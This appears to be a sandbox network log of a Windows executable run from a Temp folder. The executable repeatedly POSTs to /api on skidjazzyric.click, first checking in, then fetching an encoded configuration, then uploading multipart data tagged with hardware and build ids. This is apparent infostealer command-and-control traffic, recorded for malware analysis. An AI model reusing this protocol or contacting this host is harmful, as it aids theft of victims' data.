2025-01-09 07:33:43 UTC	802	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cyrgGBiZg1b0YYIBmelXGcv6%2BNsEsRBSr8nGyV0qvBONbPNTi1225sl%2FxjzUlY%2Fu3v%2FVJ1GVWBb1yrduR6oN7fceSm2JUPCFkN6tKt2DnAQlZsoq2PzFBdddsp8cAM8oGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bd9ea8655e6e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1594&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1800246&cwnd=235&unsent_bytes=0&cid=576619f5521aafe5&ts=435&x=0"
2025-01-09 07:33:43 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-09 07:33:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49768	104.21.80.1	443	7936	C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:33:46 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: skidjazzyric.click
2025-01-09 07:33:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-09 07:33:46 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fpgk23c2uso51mo55rt1p702mn; expires=Mon, 05 May 2025 01:20:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkbZ4esvFhSSQAHG%2BTG9LCahnWnlVM%2BbpNdDKhMaIOHqKgIqJEPRdje8kj0CM1MfG0BX2YBPsrArkXe5bpfkSzDymZujCUofsgKLiAd97a3NiUySJ1ktZV6Fusz9aBLw73Z4Fb8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bdb3ba7b7d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2007&rtt_var=760&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3058&recv_bytes=909&delivery_rate=2150220&cwnd=245&unsent_bytes=0&cid=688d03d53908711f&ts=482&x=0"
2025-01-09 07:33:46 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-09 07:33:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49775	104.21.80.1	443	7936	C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:33:47 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: skidjazzyric.click
2025-01-09 07:33:47 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-09 07:33:47 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=07akvcutn302vqtgbhg20c9qbp; expires=Mon, 05 May 2025 01:20:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWdqjQN4DkLU4nHzHwc9CZ3B56mUFqrcnZnBHir1RDP7PfESOdCUbwjdVTjMwQMXPsf0dCYkrqq9PLRl7oDcpolP7PyOnOUzgXaw%2BwDPYbyTISXO4Mqr2B%2FIfeuscOcD%2Fzxzjmw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bdba1f5b42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1548&rtt_var=600&sent=7&recv=7&lost=0&retrans=0&sent_bytes=3057&recv_bytes=976&delivery_rate=2690417&cwnd=230&unsent_bytes=0&cid=40e77de72297a1af&ts=512&x=0"
2025-01-09 07:33:47 UTC	242	IN	Data Raw: 34 63 39 30 0d 0a 6e 58 36 6b 4d 6e 41 54 45 6d 4a 6a 34 45 65 67 31 70 79 33 67 65 57 48 63 30 6b 41 58 77 66 78 34 35 42 46 74 56 42 69 72 32 58 6d 58 4e 49 51 53 69 63 2b 51 42 43 46 5a 5a 71 69 37 73 4c 6b 79 61 55 53 4c 53 4a 6c 59 5a 43 50 34 79 43 5a 63 68 54 43 52 36 63 59 78 56 34 44 64 6a 35 41 42 70 68 6c 6d 6f 33 6e 6c 65 53 4c 70 55 6c 72 5a 54 56 6c 6b 49 2f 79 4a 4e 34 2f 45 73 4d 47 39 52 4c 44 57 68 56 77 64 67 4d 50 6a 53 4c 46 73 2f 33 64 37 34 7a 71 47 79 51 69 63 79 57 55 6d 62 4a 2f 6c 78 30 48 32 77 54 51 48 39 64 5a 55 6d 34 2b 47 55 47 46 4b 59 4c 73 76 74 62 6b 68 2b 73 56 4c 57 73 33 62 35 6d 48 38 79 48 66 49 41 76 4a 44 66 55 63 77 46 73 66 65 57 49 4f 42 59 6f 70 77 37 6e 39 6c 61 33 48 Data Ascii: 4c90nX6kMnATEmJj4Eeg1py3geWHc0kAXwfx45BFtVBir2XmXNIQSic+QBCFZZqi7sLkyaUSLSJlYZCP4yCZchTCR6cYxV4Ddj5ABphlmo3nleSLpUlrZTVlkI/yJN4/EsMG9RLDWhVwdgMPjSLFs/3d74zqGyQicyWUmbJ/lx0H2wTQH9dZUm4+GUGFKYLsvtbkh+sVLWs3b5mH8yHfIAvJDfUcwFsfeWIOBYopw7n9la3H
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 34 67 6c 72 4f 6e 30 32 6f 59 4c 6a 4e 73 49 2f 45 4d 74 48 34 46 4c 66 45 42 56 39 4d 46 68 42 69 69 6e 4d 73 66 33 61 35 49 62 6c 41 79 52 69 50 6d 32 62 68 66 67 6f 32 44 30 4f 78 77 44 33 46 63 46 66 46 58 6c 32 44 77 4c 43 61 34 4b 7a 35 70 57 37 78 38 55 42 4b 47 45 70 61 49 4c 42 37 57 6e 4f 63 67 66 42 52 36 64 63 77 46 34 54 66 48 41 53 43 59 6b 75 78 36 62 31 33 4f 36 4b 35 52 77 68 62 54 35 6c 6c 49 76 34 4b 4e 30 32 44 63 41 42 2f 78 79 47 48 6c 4a 32 61 45 42 5a 77 67 62 48 70 50 6e 5a 39 63 58 66 55 54 51 73 4a 43 57 55 6a 62 4a 2f 6c 7a 6f 46 7a 67 54 30 45 38 56 59 47 57 4e 77 45 67 65 50 49 4e 43 79 2b 39 76 70 68 50 63 62 4a 57 51 2b 62 4a 69 49 39 79 44 54 63 6b 36 4e 41 4f 64 63 6e 68 41 7a 66 48 73 4d 43 35 55 6c 67 71 75 77 7a 4b 4f Data Ascii: 4glrOn02oYLjNsI/EMtH4FLfEBV9MFhBiinMsf3a5IblAyRiPm2bhfgo2D0OxwD3FcFfFXl2DwLCa4Kz5pW7x8UBKGEpaILB7WnOcgfBR6dcwF4TfHASCYkux6b13O6K5RwhbT5llIv4KN02DcAB/xyGHlJ2aEBZwgbHpPnZ9cXfUTQsJCWUjbJ/lzoFzgT0E8VYGWNwEgePINCy+9vphPcbJWQ+bJiI9yDTck6NAOdcnhAzfHsMC5UlgquwzKO
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 57 51 79 61 4a 2f 42 76 47 66 51 4b 6b 43 56 52 39 55 66 30 6c 4d 59 4d 30 55 44 44 34 77 69 31 50 54 68 6d 2f 72 48 34 68 31 72 4f 6e 31 6f 6b 6f 6e 30 4e 64 67 2f 41 38 4d 4a 38 42 6e 4a 57 42 4a 78 66 51 55 46 69 53 37 42 75 66 72 48 36 59 66 74 46 43 70 6f 4e 79 58 64 77 66 55 2f 6c 32 70 41 2f 42 44 30 58 76 4e 54 48 48 39 33 46 6b 47 64 61 39 76 30 2b 64 6d 6a 33 36 55 63 49 32 63 34 61 70 4b 4c 2f 43 4c 64 50 67 6a 44 42 4f 30 54 77 6c 41 65 65 58 6f 4e 44 34 59 74 79 37 2f 31 30 2b 4f 47 37 31 46 6c 49 6a 70 39 30 39 6d 79 45 39 41 2b 44 63 4a 46 79 68 2f 49 58 68 56 6e 4d 42 39 50 6d 32 58 46 75 4c 36 4e 6f 34 76 73 45 53 42 6f 4f 57 57 55 6a 50 63 6b 30 44 45 4e 79 67 33 78 47 38 4a 63 47 33 78 32 41 41 61 47 49 4e 43 78 39 39 6e 76 78 36 74 52 Data Ascii: WQyaJ/BvGfQKkCVR9Uf0lMYM0UDD4wi1PThm/rH4h1rOn1okon0Ndg/A8MJ8BnJWBJxfQUFiS7BufrH6YftFCpoNyXdwfU/l2pA/BD0XvNTHH93FkGda9v0+dmj36UcI2c4apKL/CLdPgjDBO0TwlAeeXoND4Yty7/10+OG71FlIjp909myE9A+DcJFyh/IXhVnMB9Pm2XFuL6No4vsESBoOWWUjPck0DENyg3xG8JcG3x2AAaGINCx99nvx6tR
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 75 4b 77 66 55 72 6c 32 70 41 78 41 37 74 45 73 68 5a 48 33 64 34 42 77 2b 50 4c 73 53 2f 2b 64 4c 6c 69 75 30 63 4c 6d 45 38 59 5a 6d 54 38 53 7a 64 50 77 71 4e 53 62 38 62 33 68 42 4b 4d 56 63 4d 4b 4a 49 2b 30 4b 4b 2b 79 71 32 65 70 52 59 6e 49 6d 55 6c 6b 49 37 37 4b 4e 38 36 44 38 49 44 38 52 72 41 58 52 64 2b 65 68 49 4a 6a 43 6a 4a 75 2f 58 48 34 34 72 68 48 53 39 71 4e 6d 2f 54 7a 37 49 67 7a 33 4a 59 6a 54 4c 79 45 38 5a 54 42 44 46 76 54 68 6a 43 49 73 37 30 70 70 58 76 69 65 55 65 4a 32 34 32 62 5a 4b 4e 2f 43 44 53 4f 77 6a 46 46 66 34 59 7a 6c 45 63 66 6e 45 45 42 49 63 68 78 62 44 34 32 71 50 4a 70 52 59 7a 49 6d 55 6c 76 4b 62 48 5a 66 59 49 51 4e 4a 4a 35 6c 7a 42 58 46 49 70 4d 41 77 43 6a 69 33 4e 73 76 66 5a 36 59 37 75 48 53 42 6d 4d Data Ascii: uKwfUrl2pAxA7tEshZH3d4Bw+PLsS/+dLliu0cLmE8YZmT8SzdPwqNSb8b3hBKMVcMKJI+0KK+yq2epRYnImUlkI77KN86D8ID8RrAXRd+ehIJjCjJu/XH44rhHS9qNm/Tz7Igz3JYjTLyE8ZTBDFvThjCIs70ppXvieUeJ242bZKN/CDSOwjFFf4YzlEcfnEEBIchxbD42qPJpRYzImUlvKbHZfYIQNJJ5lzBXFIpMAwCji3NsvfZ6Y7uHSBmM
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 39 4a 74 59 30 45 73 6f 4f 37 52 4c 4c 58 78 70 35 65 51 45 46 68 79 6a 45 75 50 54 55 35 49 6e 72 47 57 73 73 66 57 4b 4c 77 61 70 6e 39 69 49 62 33 78 48 79 50 63 74 66 55 6d 34 2b 47 55 47 46 4b 59 4c 73 76 74 7a 78 67 2b 67 44 49 6d 55 7a 61 70 43 54 38 79 72 63 49 41 66 43 41 2f 67 51 77 46 38 55 63 48 55 4b 44 59 55 67 79 62 76 79 6c 61 33 48 34 67 6c 72 4f 6e 31 4c 6d 4a 4c 6c 4a 4e 6b 35 46 74 5a 48 34 46 4c 66 45 42 56 39 4d 46 68 42 67 53 37 4a 73 50 37 5a 34 34 50 6f 45 54 6c 74 4f 6d 4b 61 69 75 41 74 30 44 55 4c 78 51 7a 77 47 74 52 63 48 47 4e 31 45 68 50 43 61 34 4b 7a 35 70 57 37 78 39 4d 57 4f 33 49 2b 4a 36 4b 58 38 54 48 63 50 77 79 4e 47 4c 45 46 68 6c 63 65 4d 53 68 41 42 34 30 73 77 62 76 2f 33 4f 2b 4b 34 42 67 75 59 7a 74 68 6d 59 Data Ascii: 9JtY0EsoO7RLLXxp5eQEFhyjEuPTU5InrGWssfWKLwapn9iIb3xHyPctfUm4+GUGFKYLsvtzxg+gDImUzapCT8yrcIAfCA/gQwF8UcHUKDYUgybvyla3H4glrOn1LmJLlJNk5FtZH4FLfEBV9MFhBgS7JsP7Z44PoETltOmKaiuAt0DULxQzwGtRcHGN1EhPCa4Kz5pW7x9MWO3I+J6KX8THcPwyNGLEFhlceMShAB40swbv/3O+K4BguYzthmY
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 63 68 2b 44 48 72 38 62 79 68 42 4b 4d 58 4d 48 41 6f 4d 76 79 37 6a 78 30 75 65 56 37 78 59 35 59 7a 78 75 6e 6f 33 79 4b 74 6f 34 41 63 51 4b 38 78 48 42 56 78 31 30 4d 45 35 42 68 54 32 43 37 4c 37 30 37 6f 7a 70 53 6e 45 69 49 69 75 4b 77 66 55 72 6c 32 70 41 7a 51 33 36 46 73 74 54 48 58 4a 69 41 51 65 51 4a 63 2b 2b 37 4e 2f 6f 67 75 67 63 4a 6d 45 37 59 35 69 4e 34 43 37 58 4d 51 75 4e 53 62 38 62 33 68 42 4b 4d 56 4d 58 46 34 67 69 7a 71 4c 31 31 4f 43 52 36 41 46 72 4c 48 31 30 6c 4a 43 79 66 38 45 69 46 38 6f 59 73 51 57 47 56 78 34 78 4b 45 41 48 69 79 50 46 73 76 44 48 35 6f 48 71 48 69 4a 72 4f 57 32 51 67 66 59 6a 30 44 63 44 77 51 7a 34 48 38 6c 55 47 33 39 35 44 30 48 4d 5a 63 57 73 76 6f 32 6a 70 76 34 53 4a 32 39 39 65 74 32 59 73 69 44 Data Ascii: ch+DHr8byhBKMXMHAoMvy7jx0ueV7xY5Yzxuno3yKto4AcQK8xHBVx10ME5BhT2C7L707ozpSnEiIiuKwfUrl2pAzQ36FstTHXJiAQeQJc++7N/ogugcJmE7Y5iN4C7XMQuNSb8b3hBKMVMXF4gizqL11OCR6AFrLH10lJCyf8EiF8oYsQWGVx4xKEAHiyPFsvDH5oHqHiJrOW2QgfYj0DcDwQz4H8lUG395D0HMZcWsvo2jpv4SJ299et2YsiD
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 55 65 6e 58 4f 5a 62 42 48 52 33 46 6b 4f 33 4a 73 79 36 2b 63 4f 6a 6d 4e 70 66 61 32 4e 39 50 61 71 59 73 6a 47 58 61 6c 4b 44 52 2b 31 63 6e 68 42 56 63 6d 49 53 42 34 45 7a 77 66 50 41 36 38 53 52 37 78 59 37 5a 53 70 71 30 38 2b 79 4b 4a 64 71 4f 59 30 4f 2b 41 66 58 52 68 39 68 64 30 41 2b 7a 47 58 61 39 4b 61 56 31 6f 54 72 48 79 78 30 4c 43 69 30 6c 2f 67 67 78 7a 55 58 77 6b 65 78 58 4d 41 51 53 69 49 2b 51 41 57 54 5a 5a 72 6b 72 49 36 32 31 4c 4a 42 65 58 31 7a 66 4e 4f 58 73 6e 2b 46 66 45 44 66 52 36 64 63 67 56 4d 41 59 33 59 44 46 34 46 69 2f 49 72 5a 7a 2b 36 42 38 67 41 56 58 44 70 2f 6e 6f 66 6c 4e 70 73 6e 41 38 4d 4a 2b 41 71 47 48 6c 4a 2b 4d 46 67 34 77 6d 32 43 69 37 43 56 2b 38 65 39 55 52 35 68 4d 32 75 55 6c 2b 4e 71 38 43 67 4e Data Ascii: UenXOZbBHR3FkO3Jsy6+cOjmNpfa2N9PaqYsjGXalKDR+1cnhBVcmISB4EzwfPA68SR7xY7ZSpq08+yKJdqOY0O+AfXRh9hd0A+zGXa9KaV1oTrHyx0LCi0l/ggxzUXwkexXMAQSiI+QAWTZZrkrI621LJBeX1zfNOXsn+FfEDfR6dcgVMAY3YDF4Fi/IrZz+6B8gAVXDp/noflNpsnA8MJ+AqGHlJ+MFg4wm2Ci7CV+8e9UR5hM2uUl+Nq8CgN
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 36 47 43 46 49 32 63 78 49 54 68 43 62 55 74 37 6e 72 33 61 44 72 46 69 70 30 4c 58 4b 63 76 38 77 79 31 44 77 4f 79 68 48 75 58 49 67 51 48 54 45 6f 4f 55 48 4b 5a 66 33 36 76 73 32 6a 33 36 55 6b 4b 47 77 7a 59 6f 57 51 76 77 44 5a 4e 51 48 62 46 2b 67 54 68 68 35 53 64 7a 42 59 55 38 78 6c 78 71 57 2b 6a 62 50 56 76 6b 52 34 4e 57 30 33 6a 4d 2f 72 5a 38 46 79 57 4a 39 4a 76 77 36 47 43 46 49 32 63 78 49 54 68 43 62 55 74 37 6e 72 33 61 44 72 46 69 70 30 4c 58 4b 63 7a 74 77 52 39 67 77 2b 32 41 54 78 45 73 46 47 41 7a 45 2b 51 41 37 43 66 66 76 30 74 70 58 63 79 61 55 4a 61 7a 70 39 55 4a 43 50 2f 43 44 42 49 30 33 71 43 66 67 64 30 45 41 46 66 6a 38 75 4e 36 4e 6c 6a 50 54 34 6c 62 76 56 71 31 45 76 63 33 30 39 77 39 4f 70 63 6f 52 6c 55 4a 38 59 73 Data Ascii: 6GCFI2cxIThCbUt7nr3aDrFip0LXKcv8wy1DwOyhHuXIgQHTEoOUHKZf36vs2j36UkKGwzYoWQvwDZNQHbF+gThh5SdzBYU8xlxqW+jbPVvkR4NW03jM/rZ8FyWJ9Jvw6GCFI2cxIThCbUt7nr3aDrFip0LXKcztwR9gw+2ATxEsFGAzE+QA7Cffv0tpXcyaUJazp9UJCP/CDBI03qCfgd0EAFfj8uN6NljPT4lbvVq1Evc309w9OpcoRlUJ8Ys
2025-01-09 07:33:47 UTC	1369	IN	Data Raw: 53 4b 54 41 74 45 34 55 31 77 66 53 77 6c 65 2f 48 76 56 45 6d 63 44 70 31 6b 4d 33 31 50 64 42 79 48 34 4d 65 76 77 71 47 43 45 45 2f 4d 42 4a 42 32 6d 57 46 75 76 50 55 34 49 6e 6d 41 7a 6c 6b 50 6e 4f 51 78 73 77 5a 2b 69 41 48 33 51 53 39 4c 63 74 55 42 47 52 7a 45 41 61 38 47 2b 2b 6d 2b 63 58 67 78 63 6b 57 4a 6d 34 44 57 36 53 51 39 54 65 56 46 41 50 62 42 4c 39 53 68 6b 68 53 4b 54 41 74 45 34 55 31 77 66 62 53 30 75 36 4c 70 51 35 6c 65 33 31 7a 30 39 6d 68 61 5a 63 67 51 4a 56 48 75 42 2f 55 51 68 52 79 5a 67 4e 47 76 42 76 76 70 76 6e 46 34 4d 58 55 48 43 39 30 4b 47 61 44 68 73 77 5a 2b 69 41 48 33 51 53 39 4f 66 77 53 49 32 64 7a 41 41 2b 46 5a 59 7a 30 35 70 57 37 78 38 67 44 4c 48 49 2b 4a 37 61 37 73 42 62 42 4d 51 44 44 41 4c 39 53 68 6c Data Ascii: SKTAtE4U1wfSwle/HvVEmcDp1kM31PdByH4MevwqGCEE/MBJB2mWFuvPU4InmAzlkPnOQxswZ+iAH3QS9LctUBGRzEAa8G++m+cXgxckWJm4DW6SQ9TeVFAPbBL9ShkhSKTAtE4U1wfbS0u6LpQ5le31z09mhaZcgQJVHuB/UQhRyZgNGvBvvpvnF4MXUHC90KGaDhswZ+iAH3QS9OfwSI2dzAA+FZYz05pW7x8gDLHI+J7a7sBbBMQDDAL9Shl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49785	104.21.80.1	443	7936	C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:33:48 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IXR9MAB3HR1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12797 Host: skidjazzyric.click
2025-01-09 07:33:48 UTC	12797	OUT	Data Raw: 2d 2d 49 58 52 39 4d 41 42 33 48 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 42 33 31 37 36 44 44 45 30 45 44 37 42 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 49 58 52 39 4d 41 42 33 48 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 58 52 39 4d 41 42 33 48 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 49 58 52 39 4d 41 42 33 48 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --IXR9MAB3HR1Content-Disposition: form-data; name="hwid"325B3176DDE0ED7BD0632DF0E28DC412--IXR9MAB3HR1Content-Disposition: form-data; name="pid"2--IXR9MAB3HR1Content-Disposition: form-data; name="lid"4h5VfH----IXR9MAB3HR1Content-D
2025-01-09 07:33:49 UTC	1137	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2gk96agk0ftp1hi9doch2kp3g1; expires=Mon, 05 May 2025 01:20:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFdY1IKvE6DVbGj321orgG%2FENoKItRkdwbta%2FbnUhTTkbkk4n343%2FWwzlYop9YRurocMtqeKdpJ%2FwxEnnePsAN6ct4Z1h5IbmiIETwb%2FKKp9fx6EGdfA4oJRaTG2iW2F%2Bt85PS8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bdc22e158c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2013&rtt_var=759&sent=10&recv=16&lost=0&retrans=0&sent_bytes=3057&recv_bytes=13732&delivery_rate=2155511&cwnd=224&unsent_bytes=0&cid=6de4a5db96c8f055&ts=572&x=0"
2025-01-09 07:33:49 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:33:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49796	104.21.80.1	443	7936	C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:33:49 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q9BBMBC4NCEVW7NW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15059 Host: skidjazzyric.click
2025-01-09 07:33:49 UTC	15059	OUT	Data Raw: 2d 2d 51 39 42 42 4d 42 43 34 4e 43 45 56 57 37 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 42 33 31 37 36 44 44 45 30 45 44 37 42 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 51 39 42 42 4d 42 43 34 4e 43 45 56 57 37 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 39 42 42 4d 42 43 34 4e 43 45 56 57 37 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 51 39 42 42 4d 42 43 Data Ascii: --Q9BBMBC4NCEVW7NWContent-Disposition: form-data; name="hwid"325B3176DDE0ED7BD0632DF0E28DC412--Q9BBMBC4NCEVW7NWContent-Disposition: form-data; name="pid"2--Q9BBMBC4NCEVW7NWContent-Disposition: form-data; name="lid"4h5VfH----Q9BBMBC
2025-01-09 07:33:50 UTC	1145	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rtsnrdb5rhtasefvb9hog7lg2r; expires=Mon, 05 May 2025 01:20:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1RLOMgr%2Bf8m9rT2bGZCVmLgtjk1uo3Ks2emU6c%2FbnmW5S5lvuPdY7Y%2FASMcYL4hYmx%2F1CqBM9YhOQE21d%2F%2FsnqFKXYpuXZkl0Rh%2F%2BXkBkSqYE5yHyTfd%2F8kDl2rJ59Hi7%2FlfW7k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bdcba97f0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1477&rtt_var=562&sent=10&recv=19&lost=0&retrans=0&sent_bytes=3058&recv_bytes=15999&delivery_rate=2898742&cwnd=232&unsent_bytes=0&cid=a6f3837231109f7f&ts=522&x=0"
2025-01-09 07:33:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:33:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49803	104.21.80.1	443	7936	C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:33:51 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G572QW358N4UW5I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20378 Host: skidjazzyric.click
